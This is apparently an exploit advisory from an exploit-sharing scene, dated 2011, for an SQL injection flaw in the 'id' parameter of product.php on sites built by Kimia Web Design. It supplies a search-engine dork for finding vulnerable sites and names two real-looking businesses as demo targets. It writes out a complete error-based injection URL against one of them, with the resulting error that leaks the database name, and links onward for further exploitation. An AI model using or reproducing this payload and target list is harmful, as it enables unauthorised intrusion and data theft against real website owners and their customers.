Kimia Web Design <= Remote (product.php) Based SQL Injection

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[~] Contact : knockoutr@msn.com

[~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com - 1337day.com - http://09exploit.com - http://0nto.me

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

|~Web App. : Kimia Web Design

|~Price : N/A

|~Version : N/A

|~Software: http://www.kimia.co.za/index.php

|~Vulnerability Style : SQL Injection

|~Vulnerability Dir : /

|~Google Keyword : Web Design by Kimia inurl:product.php?id=

|[~]Date : "26.04.2011"

|[~]Tested on :

pache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0

PHP/5.2.6-1+lenny10

AND DEMOS.

----------------------------------------------------------

product.php <= 'id' Functions Not Security

---------------------------------------------------------

Demos

http://www.lapet.co.za/product.php?id=69

http://www.essaygifts.co.za/product.php?id=272

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============================================================

    |{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}|

     

    http://www.lapet.co.za/product.php?id=69 'SQL SHELL'

     

         START! example : www.lapet.co.za

     

    [~] SQL Injecting(Db Name Get..)

 

     http://www.lapet.co.za/product.php?id=69%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

     [~]MysqL Error : Duplicate entry '~'lapete_db1'~1' for key 1

     [+]Database Name is found "lapete_db1"

 

    to Continue Explotation region Example Based error attack

  

       = >              http://www.1337day.com/exploits/14509

     

    ================================================================